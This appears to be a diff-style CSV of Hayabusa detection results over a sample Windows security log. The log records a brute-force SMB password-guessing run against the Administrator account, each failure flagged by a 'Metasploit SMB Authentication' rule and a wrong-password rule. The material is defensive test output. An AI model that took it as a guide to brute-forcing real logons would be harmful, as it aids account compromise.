+2016-09-20 01:51:33.089 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rGYNVrDBIpMBu9GT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 57qCysbeaXx12CbY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.186 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xyJl4mHvgtTv53d9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.229 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jGBDZCtot2ogcKIO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.275 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bBhmbqZIi1gX62mM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.305 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o7d4bcBJV1jlRgdt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FtfFb6hMHJiFXxai  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: frlsZMDcdb5WaW99  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.441 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CFV8UiUTRCCfab9l  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZI8P6ZeVRmQlbGtz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.537 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UmJI7S1nj5hfWZqv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.572 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: veh8XInSzXe8E9UD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: a1BuBHLILZ4afwJC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.669 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NN2h7CHnGSCQZXan  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.721 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BU3fxfM1qGBJ55HS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.758 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.802 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q1OlBmhUABabDQbN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.802 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6DgQtHG7cT05kRXd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.890 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EUTe3JqVWgDcDcOS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.890 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nGKgUOyX3USQlESB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rcIJ8keQvgax1SuL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.978 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: A7jsyA7bWtVf4sLr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.025 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mijnM28fwbgWzkvp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.065 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o6dNmJo7vkacqxA6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.115 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.155 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FxvD2OWtadDT1Q2c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.155 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WK8Esc50KVWIsLU5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.185 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: U07NeCzXSdx5Nlgs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.244 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tObVl72GJse2HCGp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nbEnp2E5a3N78OBC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.335 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IlRmyinJLWwj5yQg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.438 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 92H7tdXinUOxtOLV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.438 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Za42EUNuitIXaMBo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.493 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kz7OtswOreS0fdeS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VMxY1IHx5VuvskM7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.667 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: d6uxMqLCcqHkuesV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.667 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TmeAWYvFEbqJp1rt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.721 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.826 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8tGAdT1CBRYRatVA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.826 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: K0h9ulMPWtj8bEKI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.925 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eLyLMNv6cOp3sgrq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.098 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KIAOs16X8nFxV45x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.098 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Z4EbyEaUxUEyuiY6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.150 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SDnW5GABBLbe6eZ7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GublgQLD3RXQNmkX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.258 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2BQRppHTUHAoWPe4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.301 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gnh6HFlIW1zWEBu5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.402 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ulbcy5PWLYUm5Sy0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.402 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
